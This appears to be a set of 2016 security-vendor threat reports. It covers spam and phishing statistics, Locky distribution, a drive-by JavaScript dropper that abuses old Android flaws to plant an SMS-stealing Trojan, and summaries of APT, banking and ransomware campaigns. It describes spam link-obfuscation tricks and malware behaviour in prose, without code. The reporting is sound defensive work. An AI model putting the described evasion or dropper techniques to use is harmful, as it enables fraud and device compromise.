Particular attention should be paid to emails containing Trojan downloaders that download the Locky encryptor. The attackers exploited a variety of file types to infect victim computers: at first they used .doc files with malicious macros, then JS scripts. In order to bypass filtering, the attackers made every malicious file within a single mass mailing unique. In addition, the emails had different content and were written in different languages. This doesn’t come as much of a surprise as attacks utilizing this encryptor were registered by KSN in 114 countries around the world.

Examples of emails with the Locky encryptor

The content of the emails was related to financial documents and prompted users to open the attachment.

If the attack was successful, Locky encrypted files with specific extensions (office documents, multimedia content, etc.) on the user’s computer, and displayed a message with a link leading to a site on the Tor network containing the cybercriminals’ demands. This process was analyzed in more detail in our blog.

As Locky is not always contained directly in the message, we cannot estimate its share in the volume of other malicious mail. However, the scripts that download and run Locky (detected by Kaspersky Lab as Trojan-Downloader.MSWord.Agent, Trojan-Downloader.JS.Agent, HEUR: Trojan-Downloader.Script.Generic) accounted for more than 50% of all malicious programs in email traffic.

Spam terrorism

Today terrorism is one of the most widely discussed topics both in the media and when political leaders meet. Frequent terrorist attacks in Europe and Asia have become a major threat to the world community, and the theme of terrorism is widely used by cybercriminals to mislead users.

In order to prevent terrorist attacks, security measures in many countries have been enhanced, and malicious spammers have been quick to take advantage. They tried to convince recipients of mass mailings that a file attached in an email contained information that would help a mobile phone owner detect an explosive device moments before it was about to detonate. The email claimed the technology came from the US Department of Defense, was easy to use and widely available. The attachment, in the form of an executable EXE file, was detected as Trojan-Dropper.Win32.Dapato – a Trojan that is used to steal personal information, organize DDoS attacks, install other malware, etc.

‘Nigerian’ scammers also got in on the act, exploiting the theme of terrorism to try and concoct credible stories. The senders introduced themselves as employees of a non-existent FBI division involved in the investigation of terrorism and financial crime. Their story revolved around the need for the recipient to contact the sender in order to resolve issues that are preventing the payment of a large sum of money. Among the reasons given for the delay in transferring the money the scammers cited a lack of confirmation that the money was legal and rightfully belonged to the recipient, or it was claimed third parties were trying to pocket the recipient’s money.

Nigerian letters also told stories of money – some of which was offered to the recipient – that had been obtained legally and was not related to drugs, terrorism or other crime. This was an attempt to dispel any doubts about their honesty and persuade recipients to reply.

The theme of terrorism came up again in tales related to the current situation in the Middle East. For example, some emails were sent on behalf of US soldiers who were fighting against terrorism in Afghanistan and were looking for an intermediary to save and invest money for them. Yet another author claimed that he had not joined ISIS or any another terrorist organization, but as a Muslim he wanted to donate a large sum of money for good deeds. A mistrust of charities meant the “Muslim” wanted to transfer the money to the recipient of the email. Yet another story was written on behalf of an American businessman who had lost half his business in Syria and Iraq because of the war and terrorism, and was looking for a partner to help him invest the remaining money.

Nigerian letters describing the tense situation in Syria also remained popular and were actively used by scammers to trick users.

We also came across advertising spam from Chinese factories offering all sorts of devices to ensure public security (for example, special devices for detecting explosives) and other anti-terrorist products.

Also trending: significant increase in volume of ‘Nigerian’ spam

It seems so-called Nigerian spammers have also felt the effects of the economic crisis, because they have recently increased their activity. In Q1 2016 we observed a significant increase in the volume of this type of mailing. In the past, the scammers encouraged recipients to respond to an email by telling a long detailed story that often contained links to articles in the mainstream media; now they send out short messages with no details, just a request to get in touch. Sometimes the email may mention a large sum of money that will be discussed in further correspondence, but there is no information about where it came from.

Perhaps the scammers believe that those who are already aware of the classic ‘Nigerian’ tricks will fall for these types of messages; or maybe they think that such short messages will be more suited for busy people who have no time to read long emails from strangers.

Spammer methods and tricks: short URL services and obfuscation

In our spam and phishing report for 2015 we wrote about obfuscation of domains. In Q1 2016, spammers continued this trend and even added some new tricks to their arsenal.

Cybercriminals continued to use short URL services, although the methods for adding “noise” to them have changed.

First of all, spammers began inserting characters – slashes, letters and dots – between the domain of a short URL service and the final link.

Both the link which the user follows and the link to the uploaded image in the email are obfuscated:

In addition to letters and dots, spammers even inserted random comment tags between slashes, and the browser continued to correctly interpret the links:

Note that the subject of the email contains the name Edward; it is also included in the comment tag used to add “noise”. In other words, the name is taken from one database while the “noise” tag is unique for each email in the mass mailing.

Russian-language spam also used obfuscation and short URL services, but the algorithm was different.

For example, to obfuscate links the @ symbol was used. To recap, the @ symbol is intended for user authentication on the site (it is actually no longer used). If the site does not require authentication, everything that precedes the @ symbol will simply be ignored. It means that in the email above, the browser will first open the site where it will execute the subquery ‘url =’ and then go to the URL specified, which belongs to a short URL service.

The link in this emails was also obfuscated with the @ symbol. Noise was also added by additional subqueries including the user’s email address, which made it unique for each email in the mass mailing.

Statistics Proportion of spam in email traffic

Percentage of spam in global email traffic, Q1 2016

The percentage of spam in overall global email traffic remained stable during the last few months of 2015. However, in January 2016 we registered a considerable increase in the share of unwanted correspondence – over 5.5 p.p. By February, however, the amount of spam in email traffic had dropped to its previous level. In March it grew again, though less dramatically. As a result, the average percentage of spam in Q1 2016 amounted to 56.92%.

Sources of spam by country

Sources of spam by country, Q1 2016

The US (12.43%) maintained its leadership, remaining the biggest source of spam in Q1 2016. Next came Vietnam (10.30%), India (6.19%) and Brazil (5.48%). China rounded off the Top 5, accounting for 5.09% of global spam.

Russia fell from last year’s second place to seventh (4.89%) in Q1 2016. It followed closely behind France (4.90%), which was sixth biggest source of spam.

Spam email size

Spam email size distribution, Q4 2015 and Q1 2016

The most commonly distributed emails were very small – up to 2 KB (79.05%). The proportion of these emails grew by 2.7 p.p. from the previous quarter. The share of emails sized 20-50 KB also increased – from 3.02% to 7.67%. The amount of emails sized 2-5 KB, however, fell significantly compared to Q4 2015 – from 8.91% to 2.5%.

Malicious email attachments

Currently, the majority of malicious programs are detected proactively by automatic means, which makes it very difficult to gather statistics on specific malware modifications. So we have decided to turn to the more informative statistics of the Top 10 malware families.

Top 10 malware families
  1. Trojan-Downloader.JS.Agent.
  2. A typical representative of this family is an obfuscated Java script. This family malware uses ADODB.Stream technology that allows them to download and run DLL, EXE and PDF files.

  3. Trojan-Downloader.VBS.Agent.
  4. This is a family of VBS scripts. As is the case with the JS.Agent family, ranked first, the representatives of this family use ADODB.Stream technology; however, they mainly download ZIP files, from which they extract and run other malicious software.

  5. Trojan-Downloader.MSWord.Agent.
  6. The representatives of this family are DOC files with an embedded macro written in Visual Basic for Applications (VBA) that runs when the document is opened. The macro downloads other malware from the cybercriminal’s site and launches it on the victim’s computer.

  7. Backdoor.Win32.Androm. Andromeda.
  8. This is a family of universal Andromeda/Gamarue modular bots. The key features of these bots include downloading, storing and launching malicious executable files; downloading and uploading a malicious DLL (without saving it to disk); updating and deleting themselves. The bot functionality is extended with plug-ins that can be loaded at any time.

  9. Trojan.Win32.Bayrob.
  10. The malicious programs of this Trojan family can download from the command server and run additional modules, as well as work as a proxy server. They are used to distribute spam and steal personal data.

  11. Trojan-Downloader.JS.Cryptoload.
  12. A typical representative of this family is an obfuscated Java script. The malicious programs of this family download and run ransomware on the user’s computer.

  13. Trojan-PSW.Win32.Fareit.
  14. This malware family was designed to steal data such as credentials for FTP clients installed on an infected computer, credentials for cloud storage programs, cookie files in browsers, passwords for email accounts. The stolen information is sent to the criminals’ server. Some members of the Trojan Fareit family are capable of downloading and running other malware.

  15. Trojan.Win32.Agent.
  16. The malicious programs of this family destroy, block, modify or copy data or disrupt the operation of computers or computer networks.

  17. Trojan-Downloader.Win32.Upatre.
  18. The Trojans of this family do not exceed 3.5 KB, and their functions are limited to downloading payloads on the infected computer – more often than not these are Trojan bankers known as Dyre/Dyzap/Dyreza. The main aim of this family of Trojan bankers is to steal payment data from users.

  19. Trojan-Spy.HTML.Fraud.
  20. The Trojans of this family consist of a fake HTML page sent via email that imitates an important notification from a major commercial bank, online store, or software developer, etc. The user has to enter their personal data on this page, which is then forwarded to cybercriminals.

Countries targeted by malicious mailshots

There were some significant changes in the ranking of countries targeted most often by mailshots in Q1 2016.

Distribution of email antivirus verdicts by country, Q1 2016

Germany (18.93%) remained on top. China (9.43%), which ended 2015 in 14th place, unexpectedly came second. Brazil (7.35%) rounded off the Top 3.

Italy (6.65%) came fourth in the ranking, followed by the UK (4.81%). Russia was in sixth place with a share of 4.47%.

The US (3.95%), which had been in the Top 5 countries targeted by malicious mailshots for months on end, ended Q1 in eighth.


In Q1 2016, the Anti-Phishing system was triggered 34,983,315 times on the computers of Kaspersky Lab users.

Geography of attacks

The country where the largest percentage of users were affected by phishing attacks was once again Brazil (21.5%), with a 3.37 p.p. increase from the previous quarter. The share of those attacked in China (16.7%) and the UK (14.6%) also grew compared to Q4 2015 – by 4.4 p.p. and 3.68 p.p. respectively. Japan (13.8%), which was a leader in the previous year, saw its share fall by 3.18 p.p.

Geography of phishing attacks*, Q1 2016

* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

Top 10 countries by percentage of users attacked:

Brazil 21.5% China 16.7% United Kingdom 14.6% Japan 13.8% India 13.1% Australia 12.9% Bangladesh 12.4% Canada 12.4% Ecuador 12.2% Ireland 12.0% Organizations under attack

The statistics on phishing targets are based on detections of Kaspersky Lab’s anti-phishing component. It is activated every time a user enters a phishing page when information about it is not yet included in Kaspersky Lab databases. It does not matter how the user enters the page – by clicking a link in a phishing email, in a message on a social network or as a result of malware activity. After the security system is activated, the user sees a banner in the browser warning about a potential threat.

Distribution of organizations affected by phishing attacks, by category, Q1 2016

In the first quarter of 2016, the ‘Global Internet portals’ category (28.69%) topped the rating of organizations attacked by phishers; its share increased by 0.39 p.p. from the previous quarter. Second and third were occupied by two financial categories: ‘Banks’ (+4.81 p.p.) and ‘Payment systems’ (-0.33 p.p.). ‘Social networking sites’ (11.84%) and ‘Online games’ (840 p.p.) rounded off the Top 5, having lost 0.33p.p.and 4.06 p.p. respectively.

Online stores

Attacks on online store users are interesting because they are often followed by the theft of bank card details and other personal information.

Distribution of online stores subject to phishing attacks, Q1 2016

Apple Store was the most popular online store with phishers. In the first quarter of 2016 its share in the ‘E-shop’ category accounted for 27.82%. Behind it in second place was another popular online store –Amazon (21.6%).

Example of a phishing page designed to steal Apple ID and bank card data

Steam (13.23%), a popular gaming service that distributes computer games and programs, rounded off the Top 3. It came 19th in the overall ranking of organizations affected by phishing attacks.

Links to phishing pages exploiting the theme of online games and gaming services are distributed via banners, posts on social networking sites, forums and, less frequently, via email.

Cybercriminal interest in Steam and gaming services in general is growing – gamers’ money and personal data are often targeted not only by phishers but also by software developers.

Top 3 organizations attacked<

Fraudsters continue to focus the greatest part of their non-spear phishing attacks on the most popular companies. These companies have lots of customers around the world which enhances the chances of a successful phishing attack.

The Top 3 organizations attacked most often by phishers accounted for 21.71% of all phishing links detected in Q1 2016.

Organization % of detected phishing links 1 Yahoo! 8.51 2 Microsoft 7.49 3 Facebook 5.71

In Q1 2016, the leading three organizations targeted by phishers saw a few changes. Yahoo! remained top (+1.45 p.p.). Microsoft (+2.47 p.p.) came second, followed by Facebook (-2.02 p.p.).

Interestingly, phishing on Facebook is delivered in almost all languages.

Facebook is also popular with cybercriminals as a means of spreading malicious content. We wrote about one such scheme in a recent blog.


In the first quarter of 2016 the percentage of spam in email traffic increased by 2.7 percentage points compared with the previous quarter. But it is too early to speak about a growth trend. The proportion of spam grows significantly at the beginning of every year because the amount of normal email decreases over the holiday period.

The US remained the biggest source of spam in Q1 2016. The Top 5 also included Vietnam, India, Brazil and China – all large, fast developing countries with high levels of internet connection.

Spam messages are becoming shorter. In the first quarter, the proportion of emails up to 2 KB exceeded 80% of all spam.

Q1 of 2016 saw the amount of spam containing malicious attachments increase dramatically. The share of malicious attachments in mail reached a peak in March – four times greater than last year’s average. This rapid growth was caused, specifically by the popularity of crypto-ransomware which was either contained in emails or downloaded to computers via a Trojan downloader.

This growth confirms our long-term forecasts on the gradual criminalization of spam that makes it even more dangerous, as well as reducing the overall share of email traffic. The diversity of languages, social engineering, lots of different types of attachments, text changing within a single mass mailing – all this takes spam to a new level of danger. Moreover, these malicious mass mailings have broad geographical coverage. The picture of malware distribution by email has changed significantly this year. In particular, China came an unexpected second in the ranking of countries targeted by malicious mailshots.

Another factor confirming the trend of increasingly criminalized spam is the growth of fraudulent, namely ‘Nigerian’, spam in the first quarter of 2016.

It is unlikely that the amount of malicious spam will continue to grow so rapidly: the more cybercriminals distribute malicious spam, the more people get to know of its dangers and the more careful they become about opening suspicious attachments. Therefore, such attacks will gradually fade away after a few months. However, there is the risk they may be replaced by other, even more complex attacks.

Two-Step Verification

SANS Tip of the Day - Thu, 05/12/2016 - 01:00
Two-step verification is one of the best steps you can take to secure any account. Two-step verification is when you require both a password and code sent to or generated by your mobile device. Examples of services that support two-step verification include Gmail, Dropbox and Twitter.

Results of PoC Publishing

Malware Alerts - Wed, 05/11/2016 - 07:01

Dreams of a Threat Actor

There are two crucial features of the Android OS protection system:

  1. it is impossible to download a file without user’s knowledge on a clean device;
  2. it is impossible to initialize installation of a third-party app without user’s knowledge on a clean device.

These approaches greatly complicate malware writers’ lives: to infect a mobile device, they have to resort to ruses of social engineering. The victim is literally tricked into force-installing a Trojan. This is definitely not always possible, as users become more aware, and it is not that easy to trick them.

Invisible installation of a malware app onto a mobile device without a user’s knowledge is definitely a daydream of many a malware writer. To do that, it is necessary to find and exploit an Android system vulnerability. These vulnerabilities have been found: we are talking about CVE-2012-6636, CVE-2013-4710, and CVE-2014-1939.

These vulnerabilities allow to execute any code on a device by means of a custom-made HTML page with a JavaScript code. The vulnerabilities have been closed, starting with Android 4.1.2.

It would be great to say that everything is fine now, but, alas, that is not so. We should not forget about the third feature of the Android OS: a device manufacturer is responsible for creating and deploying updates for its specific device model.

Updating the Android operating system is decentralized: each company uses its own custom version of Android, compiled with its own compilers and supplied with its own optimization and drivers. Regardless of who has found a vulnerability and whether that person has informed the OS developer about it, releasing updates is a prerogative of each manufacturer. Only manufacturers are capable of helping the users.

Nevertheless, updates are released somewhat periodically but mostly for the leading models: not all of the manufacturers actively support all of their models.

A publically available detailed description of vulnerabilities for the Android OS provides malware writers with all of the required knowledge. Incidentally, a potential victim of the vulnerability exploits can remain such for a long period of time: let us call it “an endless 0-day”. The problem can be solved only by buying a new device.

This, in particular, coupled with publically available descriptions of the vulnerabilities and examples of the vulnerabilities being exploited, incited malware writers into developing an exploit and performing drive-by attacks onto mobile devices.

Web Site Infection

Drive-by attacks on computers of unsuspecting users give a large audience to threat actors (if they manage to post a malicious code on popular web sites) as well as invisibility (inasmuch as users do not suspect being infected). Owners of compromised web sites may not suspect being infected for a long time as well.

The method of code placement and other attack features allow one to distinguish web sites infected with the same “infection”. For quite long, we observed a typical infection within a group of minimum several dozens of Russian web sites of different types and attendances, including quite well-known and popular resources (for example, web sites with a daily turn-out of 25,000 and 115,000 users). Web-site infection from this group is characterized by the usage of the same intermediate domains, the similarity of the malicious code placed onto them, the method of code placement (in most cases, it is placed on the same domain as an individual JavaScript file), as well as speed and synchronicity of changes in the code on all of the infected web sites after the malicious code has been detected.

The attack method has been standard (even though it has gone through some changes), and it has been used at least since 2014. It has been standard also owing to its targeting Windows OS users. However, some time ago, after threat actors performed a regular modification of the code on infected web sites, we discovered a new script instead of a “common” one that uploads flash exploits. It checked for the “Android 4” setting in User-Agent and operated with tools uncommon for Windows. This anomaly urged us to study the functionality of the script meticulously and watch the infection more closely.

Thus, on the 22nd of January 2016, we discovered a JavaScript code that exploited an Android vulnerability. Only within 3 days, on the 25th of January 2016, we found a new modification of this script with more threatening features.


We managed to detect two main script modifications.

Script 1: Sending SMS

The only goal of the first script is to send an SMS message to a phone number of threat actors with the word “test”. For that, the malware writers took advantage of the Android Debug Bridge (ADB) client that exists on all of the devices. The script executes a command to check for the ADB version on a device using the Android Debug Bridge Daemon (ADBD). The result of the command execution is sent to the server of the threat actors.

The code for sending an SMS is commented. In fact, it cannot be executed. However, if it is uncommented, then devices with the Android version below 4.2.2 could execute the commands given by malware writers. For newer versions of Android, the ADBD local connection (in the Loopback mode) is forbidden on the device.

Sending an SMS to a regular number does not promise big losses for the victim, but nothing prevents the malware writers from replacing the test number with a premium-rate number.

The first malicious script modification should not cause any big problems for users, even if the threat actors would be able to send an SMS to a short code. Most mobile carriers have the Advice-of-Charge feature, which does not apply any charges for the first SMS to a premium-rate number: one more message with a specific text must be sent. This is impossible to do from within a JavaScript code for the specific case. This is why, most likely, a second modification of the script has appeared.

Script 2: SD-Card File

The second script, in effect, is a dropper. It drops a malicious file from itself onto an SD card.

By resorting to unsophisticated instructions, part of the script body is decrypted. First of all, separators are removed from the string:

Then, the string is recorded onto an SD card into the MNAS.APK file:

The string must be executed. As a result, the created app should be installed onto the system:

However, this code is yet still commented.

Let us review the script in more detail. The script has a check for a specific Android version (it has to be 4).

Obviously, the malware writers know which versions are vulnerable, and they are not trying to run the script on Android 5 or 6.

Just like with the first script, the second has an ADB check at the control center side:

In this case, the check will not affect anything; however, the ADB version is really essential, since not all of the versions support a local connection with ADBD.

We analyzed several modifications of the second script, which allowed us to track the flow of thought of the malware writers. Apparently, their main goal was to deliver the APK file to the victim.

Thus, some earlier script modifications send data about each executed command to the control center:

In this case, the SD card is checked for the MNAS.lock file. If it is not there, then the script tries to create the MNAS.APK file with a zero size by using a touch utility.

In later script modifications, the task of the APK file delivery to the victim was solved by using the ECHO command, which allows to create any file with any content on a device:

As a result of the ECHO command execution, a malicious APK file is created on the SD card.


The second script, in the state as we have discovered it, created and wrote a malicious file, which also needed to be executed, onto an SD card. Inasmuch as the dropper script does not contain a Trojan execution mechanism, the task has to be fulfilled by the user.

The APK file dropped from the script can be detected by Kaspersky Lab as Trojan-Spy.AndroidOS.SmsThief.ay. Since the beginning of 2016, we have managed to find four modifications of the Trojan.

Malware writers use the “” name inside the Trojan code:

At the same time, the malicious file has enough privileges to carry out fully fledged attacks onto the wallet of the victim by sending SMS messages:

The first action that the malicious code does after its execution is requesting administrator rights for the device. After obtaining the rights, it will conceal itself on the application list, thus making it difficult to detect and remove it:

The Trojan will wait for incoming SMS messages. If they fall under given rules, for example, if the come from a number of one of the biggest Russian banks, then these messages will be forwarded at once to the malware writers as an SMS:

Also, the intercepted messages will be forwarded to the server of the threat actors:

Aside from the controlling server, the threat actors use a control number to communicate with the Trojan: the data exchange occurs within SMS messages.

The control number initially exists in the malicious code:

The Trojan awaits specific commands from the control center and in SMS messages from the control number.

A command to change the control number can come from the server of threat actors:

The following commands can come from a control number:

  • SEND: send an SMS to an indicated number with indicated text;
  • STOP: stop forwarding SMS messages;
  • START: start forwarding SMS messages.

For the moment, the functionality of the Trojan is limited to intercepting and sending SMS messages.


The task of carrying out a mass attack on mobile users is solved by infecting a popular resource that harbors a malicious code that is capable of executing any threat actors’ command on an infected mobile device. In case of the attacks described in the article, the emphasis has been placed on devices of Russian users: these devices are old and not up-to-date (notably, Russian domains have been infected).

It is unlikely that the interest of the malware writers towards drive-by attacks on mobile devices will decrease, and they will keep finding methods of carrying out these attacks.

It can be inferred that it is obvious that the attention of malware writers towards publications of research laboratories regarding the topic of Remote Code Execution vulnerabilities will increase, and the attempts to implement attacks by using mobile exploits will persist.

It is also obvious that no matter how enticing publishing is for a 0-day vulnerability, it is worth to refrain from showing detailed exploit examples (Proof of concept). Publishing the mentioned examples most likely will lead to someone creating a fully functional version of a malicious code.

There is a good news for the owners of old devices: our Kaspersky Internet Security solution is capable of protecting your device by tracking changes on the SD card in real time and removing a malicious code as soon as it is written to the SD card. Therefore, our users are protected from the threats known to Kaspersky Lab, which are delivered by the drive-by download method.

IT threat evolution in Q1 2016

Malware Alerts - Thu, 05/05/2016 - 06:57

 Download PDF version

Q1 figures
  • According to KSN data, Kaspersky Lab solutions detected and repelled 228,420,754 malicious attacks from online resources located in 195 countries all over the world.
  • 74,001,808 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 18,610,281 unique malicious objects: scripts, exploits, executable files, etc.
  • There were 459,970 registered notifications about attempted malware infections that aim to steal money via online access to bank accounts.
  • Crypto ransomware attacks were blocked on 372,602 computers of unique users.
  • Kaspersky Lab’s file antivirus detected a total of 174,547,611 unique malicious and potentially unwanted objects.
  • Kaspersky Lab mobile security products detected:
    • 2,045,323 malicious installation packages;
    • 4,146 mobile banker Trojans;
    • 2,896 mobile ransomware Trojans.

2016 has only just got underway, but the first three months have already seen the same amount of cybersecurity events that just a few years ago would have seemed normal for a whole year. The main underlying trends remained the same, while there was significant growth in trends related to traditional cybercrime, especially mobile threats and global ransomware epidemics.

Ransomware became the main theme of the quarter after knocking targeted attacks from the top of the most popular threat rating. Unfortunately, this is a situation that will continue to evolve, and those behind the extortion could well end up being named “problem of the year”.

Targeted attacks BlackEnergy2/3

The BlackEnergy cyberattack on the Ukrainian energy sector was the most high-profile incident. Although it occurred at the end of last year, a fuller picture of what happened only appeared in the course of the subsequent analysis. Moreover, attempts by cybercriminals to arrange new attacks continued in 2016.

The attack was unique because of the damage it caused – the hackers managed to disable the power distribution system in Western Ukraine, launch the Wiper program on the targeted systems and carry out a telephone DDoS on the technical support services of the affected companies.

There were numerous publications about the attack, and Kaspersky Lab’s experts revealed several aspects of the activities of the group responsible. In particular, they published an analysis of the tool used to penetrate the systems – a malicious DOC file.

For those who want to learn more about the attack, we recommend the report prepared by the American SANS Institute and ICS-CERT.


In February, the experts at Kaspersky Lab revealed details about the activities of Poseidon – the first Portuguese-speaking targeted attack group which had set up a custom-tailored malware boutique.

Although the report was only released in 2016, the group has been operational for a long time. Malware campaigns that were most probably supported by Poseidon were detected as far back as 2005, while the first sample dates back to 2001. Poseidon’s arsenal is focused primarily on the Microsoft Windows operating system family: from Windows 95, which the group targeted in its early days, to Windows 8.1 and Windows Server 2012, which were targeted by the most recently detected malware samples.

The attack scenario is carefully tailored to the victim. Although the initial infection occurs according to the same scenario, the following stages of the campaign specifically customize the infection method for each new victim. That is why the specialists from the Global Research & Analysis Team (GReAT) decided to call Poseidon a “custom-tailored malware boutique”.

Having gained access to the corporate network, the criminals move across the network and collect as much data as possible in order to escalate their privileges, create a network map and to identify the computer they need. The main target of the attack is usually the local Windows domain controller. Once they have control over it, the attackers can steal intellectual property, data, trade secrets, and other valuable information.

The information collected by Poseidon for its owners was in most cases used to blackmail victim companies into contracting the Poseidon Group as a security firm. Regardless of whether a contract was signed, Poseidon remained on the network.

Hacking Team

Yet another infamous “boutique” creating cyber-espionage tools, the Italian company Hacking Team, fell victim to a cyberattack last year in which a huge database of its employee email correspondence was stolen, as well as project source codes.

The incident revealed a lot of problems in the work of the company and many thought it would be very difficult for the business to develop further. However, at the beginning of 2016 new Hacking Team implants for OSX were found. This indicates that the group has no intention of halting its work and is continuing to develop in the sphere of secondary operating systems. This means their “creations” will continue to be a problem for users who have become an object of interest for HT customers.

Yet another story related to Hacking Team was the hunt for a Microsoft Silverlight 0-day. Information about the possible presence of this vulnerability was found in the Italian company’s documents. Based on very little initial data and armed with the Yara and VirusTotal tools, our experts set a trap and waited. And sure enough, they detected a 0-day exploit.


Kaspersky Lab was among the participants in operation Blockbaster, a joint investigation conducted by several major IT security companies. The subject of the investigation was activity by the Lazarus Group, a cybercriminal gang of supposedly North Korean origin that was involved in the attack on Sony Pictures in 2014.

The Lazarus Group has been around since 2009, but their activities moved up a gear from 2011. The group is responsible for such well-known attacks as Troy, Dark Seoul (Wiper), WildPositron. During the investigation over 40 different types of malicious program, which they had created over the years, were detected. In particular, the group used their malware to attack companies, financial institutions, radio and television. Use of exploits for 0-day vulnerabilities was also recorded.

Hospitals under attack

This section on targeted attacks should also include Sergei Lozhkin’s research on how hackers can penetrate the internal network of hospitals and gain full access to patient data using publicly available tools and services.

Unfortunately, medical institutions are being targeted more and more by such attacks. In the first quarter of 2016, there were several incidents of hospital networks being infected with various types of Trojan ransomware that encrypts data and demands a ransom to decrypt it.

The latest incident was an attack on the MedStar network that affected 10 hospitals. According to the network’s official report, the data was saved without paying a ransom to the blackmailers, while another hospital in California ended up paying $17,000 for a ransomware crypto key.

Cybercrime Adwind

At the Security Analyst Summit 2016 (SAS 2016) our GReAT experts presented the results of their investigation into the Trojan known as Adwind RAT (Remote Access Tool). Having studied the activity of the malware, the researchers came to the conclusion that even the story behind the Trojan’s creation was out of the ordinary.

The Trojan was developed continuously over several years, with the first samples appearing in 2012. It has had different names at different times: in 2012, the creators were selling it as Frutas; in 2013 it was called Adwind; in 2014 the Trojan was known as Unrecom and AlienSpy; and in 2015 it was named JSocket.

The GReAT experts believe that Adwind and all its incarnations have been developed by one hard-working hacker who has been releasing new features and modules for four years.

The Adwind platform was initially only available in Spanish, but an English-language interface was added later, allowing cybercriminals worldwide to evaluate it. The main users of this Trojan are those conducting advanced cyber fraud, unscrupulous competitors, as well as so-called Internet mercenaries who are paid for spying on people and organizations online. Adwind can also be used by anyone wishing to spy on their friends.

Geographically, the biggest concentration of victims has also changed over the last four years. In 2013, the targets were mostly in Spanish- and Arabic-speaking countries. The following year, cybercriminals focused on Turkey and India, as well as the United Arab Emirates, the United States and Vietnam. In 2015, Russia topped the rating with the United Arab Emirates, Turkey, the United States and Germany close behind.

Fortunately, our investigation was not in vain – a few days after its publication, the JSocket website stopped working and the Adwind author ceased their activity. Since then, no new versions of the Trojan have appeared. Perhaps we can expect another reincarnation of the Trojan, or maybe this is the end of the story.

Banking threats

At the Security Analyst Summit (SAS in 2016), Kaspersky Lab announced the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights.

In 2015, Kaspersky Lab researchers conducted incident response investigations for 29 organizations located in Russia that were infected by these three groups.

There are other cybercriminal groups currently attacking banks in Russia, but these three are the most active and are involved in the most high-profile thefts from both customer bank accounts and the banks themselves.

The activity of Carbanak 2.0 is of particular interest. In December 2015, Kaspersky Lab confirmed that the group was still active after discovering signs of Carbanak in a telecommunications company and a financial organization. An interesting feature of the Carbanak 2.0 group is that they have a different type of victim. The group has moved beyond banks and is now targeting the budgeting and accounting departments of any organization that interests them, using the same APT-style tools and techniques.

In one remarkable case, the Carbanak 2.0 gang used its access to a financial institution that stored information about shareholders to change the ownership details of a major company. The information was modified to name a money mule as a shareholder of the company, displaying their IDs.


Yet another criminal gang known as Buhtrap came to the fore in the first quarter. It is responsible not only for the theft of hundreds of millions of rubles from Russian banks but also for organizing a targeted attack on banks using the names and attributes of FinCERT, a special department of the Central Bank of Russia created to detect cyberattacks and notify member banks. It was the first time that attackers had used the FinCert “brand” and the attack was carefully prepared; a corresponding domain name was created and the identifiers used by FinCERT were studied closely.

The malicious mass mailing affected hundreds of banks in Russia. The attackers have a database of their employee email addresses, including names and surnames. A legitimate remote administration tool was used as the remote access module installed in the system.


On the global arena, the most prominent attack on banks was that involving the Central Bank of Bangladesh. It was not just the object of the attack – the Central Bank – that was remarkable but also the amount of money the attackers managed to steal, plus the amount they tried to steal but failed.

The investigation is still ongoing, but according to the information that has been made public, it is possible to put together a picture of what happened. Back in early February, hackers managed to access the workstations of several employees at the national bank. Using their identities, the fraudsters began to send out transfer orders for money held in different banks including the New York Federal Reserve Bank. With full access and posing as employees, they were able to steal approximately $80 million. The money was transferred to accounts in the Philippines and then passed through a money-laundering scheme involving local casinos and forex brokers.

Another $20 million would have been transferred to Sri Lanka, but the hackers made an error in the name of a recipient organization; this aroused the suspicion of Deutsche Bank, which was the correspondent bank of the Central Bank of Bangladesh. An investigation found that the payment order had been initiated by hackers, and approximately $900 million was still waiting to be transferred.

It’s worth noting that Bangladesh’s Minister of Finance only learned about the incident a month later from the mass media. The head of the Central Bank was forced to resign, the investigators are currently trying to trace those responsible, and the bank is taking measures to return at least some of the stolen funds.

Ransomware Trojans

As we mentioned above, ransomware Trojans were the main theme of the quarter and could well become the main problem of the year.

Making the situation worse is the fact that a number of ransomware Trojans have become accessible to anyone with a little bit of cyber know-how in the form of source code. As a consequence, even the average script-kiddy can deploy their own version of the Trojan which, together with the active use of Bitcoin for paying ransoms, makes it much easier to organize attacks with impunity.

Moreover, the term Ransomware-as-a-Service (RaaS) has already come into use. This involves the attackers offering to pay for Trojan distribution, promising a cut of any ransom money received. The clients of these services are usually webmasters of porn sites. There are services that work the other way round, offering a complete set of tools to the encryptor who takes responsibility for distributing the Trojan and takes 10% of the ransom as commission.

According to reports from several companies, the first quarter of 2016 saw incidents where ransomware was used by a number of well-known APT-groups, mainly Chinese. We also identified similar cases, and not only involving Chinese groups. If these incidents become a trend, the threat will move to a new level because the damage caused by ransomware is not much different from that caused by Wiper-type Trojans. In both cases, user data becomes inaccessible.

In addition, ransomware Trojans are expanding their sphere of activity; in Q1 2016, CTB-Locker targeted web servers.

The earlier version of CTB-Locker known as crypto-ransomware Onion differed from other ransomware in that it used the anonymous network Tor to protect its command servers from being disabled because, as a rule, it is only possible to disable static servers. The use of Tor also helped the malware avoid detection and blocking. There was one more thing that protected CTB-Locker operators: payment was only accepted in Bitcoins, a decentralized anonymous cryptocurrency.

The new version of this malicious program encrypts web servers, and demands less than half a Bitcoin (~ $150) as ransom. If the money is not paid on time, the ransom is doubled to about $300. Once the ransom is paid, a key is generated to decrypt the web server files.

However, the biggest crypto epidemic of Q1 2016 was caused by the ransomware Trojan Locky (detected by Kaspersky Lab products as Trojan-Ransom.Win32.Locky).

This Trojan is continuing to spread; Kaspersky Lab products have recorded attempts to infect users in 114 countries around the world.

In order to spread the Trojan, the cybercriminals use mass mailings in which malicious loaders are attached to spam messages. Initially, the malicious spam messages contained a DOC file attachment with a macro that downloaded the Locky Trojan from a remote server and executed it.

At the time of writing, the malicious spam is still being sent, but instead of DOC files being attached there are now ZIP archives containing one or more obfuscated scripts in JavaScript. The messages are mostly in English, though some bilingual variants have appeared.

The most significant technical innovation in ransomware was full disk encryption (more specifically, encryption of the file system table) rather than file encryption. This trick was used by the Petya Trojan (the fact that it has a Russian name does not necessarily mean that it was created by Russian-language malware writers).

After encrypting the main file table, Petya shows its true face – a skull and crossbones composed of ASCII characters. Then the typical encryptor routine begins: the Trojan demands a ransom from the victim, 0.9 Bitcoin (about $380) in this case.

